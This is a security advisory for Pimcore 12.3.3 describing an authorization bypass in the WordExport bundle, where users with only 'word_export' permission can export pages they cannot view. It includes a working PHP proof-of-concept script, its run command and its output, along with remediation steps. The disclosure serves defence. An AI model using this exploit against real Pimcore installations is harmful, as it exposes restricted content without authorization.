GHSA-332x-r494-54fq

### Summary

The `WordExport` export flow only checks whether the current backend user has the feature permission `word_export`. It does not verify access rights on the target element itself. As a result, a low-privileged backend user can export document content even when the user does not have `view` permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

- `POC-WORDEXPORT-TITLE` - `POC-WORDEXPORT-DESC`

### Root Cause

The controller only performs a feature-level permission check before starting the export flow:

- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L44)#L41) - [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)#L44)

It then directly resolves the target element from attacker-controlled `type/id` input:

- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56) - [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)#L58)

For document-like elements such as `Page` and `Snippet`, it renders content in an admin context:

- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72) - [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113) - [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)

No object-level authorization check such as `isAllowed('view')` is enforced on the target element.

### Affected Scope

Based on the source code, the following element types may be affected:

- `page` - `snippet` - `email` - `object`

For page-like documents, the `pimcore_admin = true` rendering context may expose additional backend-visible content.

### Preconditions

- The attacker is an authenticated backend user - The attacker has the `word_export` permission - The attacker does not have `view` permission on the target document

### Reproduction Environment

- Reproduction root: `pimcore-12.3.3-repro` - Standalone PoC script: [[poc_wordexport.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3-repro/tools/poc_wordexport.php)](pimcore-12.3.3-repro/tools/poc_wordexport.php)

```php <?php declare(strict_types=1);

use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController; use Pimcore\Controller\UserAwareController; use Pimcore\Model\Document\Page; use Pimcore\Model\User; use Pimcore\Security\User\TokenStorageUserResolver; use Pimcore\Security\User\User as SecurityUser; use Pimcore\Serializer\Serializer as PimcoreSerializer; use Pimcore\Tool\Authentication; use Symfony\Component\DependencyInjection\ContainerInterface; use Symfony\Component\Filesystem\Filesystem; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\RequestStack; use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken; use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;

require dirname(__DIR__) . '/vendor/autoload.php';

define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));

try { \Pimcore\Bootstrap::bootstrap();

$kernel = new \App\Kernel('dev', true); \Pimcore::setKernel($kernel); $kernel->boot();

$container = $kernel->getContainer();

/** @var RequestStack $requestStack */ $requestStack = getService($container, [ RequestStack::class, 'request_stack', ]);

$admin = User::getByName('admin'); if (!$admin instanceof User) { fail('admin user is missing'); }

$auditor = User::getByName('auditor_wordexport'); if (!$auditor instanceof User) { $auditor = new User(); $auditor->setParentId(0); $auditor->setName('auditor_wordexport'); }

$auditor->setAdmin(false); $auditor->setActive(true); $auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass')); $auditor->setPermissions(['word_export']); $auditor->setRoles([]); $auditor->setWorkspacesDocument([]); $auditor->setWorkspacesAsset([]); $auditor->setWorkspacesObject([]); $auditor->save();

$page = Page::getByPath('/poc-wordexport-secret-page'); if (!$page instanceof Page) { $page = new Page(); $page->setParentId(1); $page->setKey('poc-wordexport-secret-page'); }

$page->setPublished(true); $page->setController('App\\Controller\\DefaultController::defaultAction'); $page->setTemplate('default/default.html.twig'); $page->setTitle('POC-WORDEXPORT-TITLE'); $page->setDescription('POC-WORDEXPORT-DESC'); $page->setProperty('language', 'text', 'en', false, true); $page->setUserOwner($admin->getId()); $page->setUserModification($admin->getId()); $page->save();

$canViewPage = $page->getDao()->isAllowed('view', $auditor);

$tokenResolver = buildTokenResolver($auditor); $controller = wireController(new WordExportController(), $container, $tokenResolver);

$exportId = 'wordexportpoc1'; $exportRequest = new Request([], [ 'id' => $exportId, 'data' => json_encode([ ['type' => 'document', 'id' => $page->getId()], ], JSON_THROW_ON_ERROR), 'source' => 'en', ]);

$requestStack->push($exportRequest); $controller->wordExportAction($exportRequest, new Filesystem()); $requestStack->pop();

$downloadRequest = new Request(['id' => $exportId]); $requestStack->push($downloadRequest); $downloadResponse = $controller->wordExportDownloadAction($downloadRequest); $requestStack->pop();

$wordContent = (string) $downloadResponse->getContent();

echo json_encode([ 'vulnerability' => 'wordexport_authorization_bypass', 'user' => [ 'id' => $auditor->getId(), 'name' => $auditor->getName(), 'permissions' => $auditor->getPermissions(), ], 'target_page' => [ 'id' => $page->getId(), 'path' => $page->getFullPath(), 'title' => $page->getTitle(), 'description' => $page->getDescription(), 'user_can_view_page' => $canViewPage, ], 'result' => [ 'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'), 'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'), ], ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL; } catch (Throwable $e) { fail(sprintf( '%s: %s in %s:%d%s', $e::class, $e->getMessage(), $e->getFile(), $e->getLine(), $e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : '' )); }

function wireController( UserAwareController $controller, ContainerInterface $container, TokenStorageUserResolver $tokenResolver ): UserAwareController { $controller->setContainer($container); $controller->setTokenResolver($tokenResolver);

if (method_exists($controller, 'setPimcoreSerializer')) { /** @var PimcoreSerializer $serializer */ $serializer = getService($container, [ PimcoreSerializer::class, 'Pimcore\\Serializer\\Serializer', ]); $controller->setPimcoreSerializer($serializer); }

return $controller; }

function buildTokenResolver(User $user): TokenStorageUserResolver { $tokenStorage = new TokenStorage(); $proxyUser = new SecurityUser($user); $token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles()); $tokenStorage->setToken($token);

return new TokenStorageUserResolver($tokenStorage); }

function getService(ContainerInterface $container, array $ids): mixed { foreach ($ids as $id) { try { if ($container->has($id)) { return $container->get($id); } } catch (Throwable) { } }

fail('Unable to resolve service: ' . implode(', ', $ids)); }

function fail(string $message): never { fwrite(STDERR, $message . PHP_EOL); exit(1); }

```

### Reproduction Steps

1. Create a low-privileged user named `auditor_wordexport` with only the `word_export` permission and no document workspace permissions. 2. Create a test page at `/poc-wordexport-secret-page` containing sensitive values: - `title = POC-WORDEXPORT-TITLE` - `description = POC-WORDEXPORT-DESC` 3. Verify that the user does not have `view` permission on that page. 4. Execute `wordExportAction()` and `wordExportDownloadAction()` as that user. 5. Check whether the exported HTML contains the sensitive values.

Reproduction command:

```bash cd pimcore-12.3.3-repro docker compose exec -T php php tools/poc_wordexport.php ```

### Reproduction Result

Relevant PoC output:

```json { "vulnerability": "wordexport_authorization_bypass", "user": { "name": "auditor_wordexport", "permissions": [ "word_export" ] }, "target_page": { "path": "/poc-wordexport-secret-page", "title": "POC-WORDEXPORT-TITLE", "description": "POC-WORDEXPORT-DESC", "user_can_view_page": false }, "result": { "download_contains_title": true, "download_contains_description": true } } ```

This shows that:

- The user cannot view the target page - The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

### Security Impact

- Unauthorized disclosure of structured page fields - Unauthorized export of restricted backend content - Potential exposure of unpublished or otherwise restricted content - Lateral data access by low-privileged backend accounts

### Remediation

1. Perform object-level authorization immediately after resolving the element from `type/id`. 2. Require at least `view` permission on the target element. 3. Apply consistent authorization checks across `page`, `snippet`, `email`, and `object`. 4. Bind export creation and export download to the requesting user or an equivalent authorization context. 5. Add regression tests to ensure that users with `word_export` but without element `view` permission cannot export content.